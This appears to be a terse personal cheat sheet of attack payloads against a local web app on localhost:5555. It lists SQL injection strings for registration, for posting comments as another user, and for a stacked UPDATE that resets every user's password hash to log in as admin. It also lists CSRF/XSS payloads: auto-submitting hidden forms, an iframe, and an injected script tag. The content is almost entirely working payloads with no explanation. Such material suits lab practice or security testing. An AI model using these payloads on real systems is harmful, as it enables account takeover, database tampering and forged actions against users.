registration injection
	injected', 'email', 'bad')--

create comment as another user
	Injected Comment', '2021-01-01 22:00:00', 2, 1); -- '

LOGIN AS admin with password 'new_pass', when realy pass is 'admin'
admin'; UPDATE public."user" SET passwd = 'pbkdf2:sha256:150000$NcRpBqvE$be4e796783281d708e488d7f310c495a19f5a2cc911d6956cd7e4536c7dc9b40'; SELECT id, username, passwd, role FROM public."user" WHERE username = 'admin

hash('new_pass') = 
'pbkdf2:sha256:150000$NcRpBqvE$be4e796783281d708e488d7f310c495a19f5a2cc911d6956cd7e4536c7dc9b40'

hash('admin') = 'pbkdf2:sha256:150000$C8yeA2EQ$c33e0257c6072ef5b2bffc85f829a66a5f4ec186205d5389f7dc44c1bc23efd2'


<form id="badform" method="POST" action="http://localhost:5555/send_email"></form> <script>document.getElementById("badform").submit();</script>

<form id="f" method="post" action="http://localhost:5555/"></form><script>document.getElementById("f").submit();</script>













<iframe name="fr" id="fr" style="display: none;"></iframe>

<form id="f" method="post" action="http://localhost:5555/" target="_blank"></form><script>document.getElementById("f").submit();</script>

<form id="f" method="post" action="http://localhost:5555/"></form><script src="http://localhost:5555/s.js"></script>
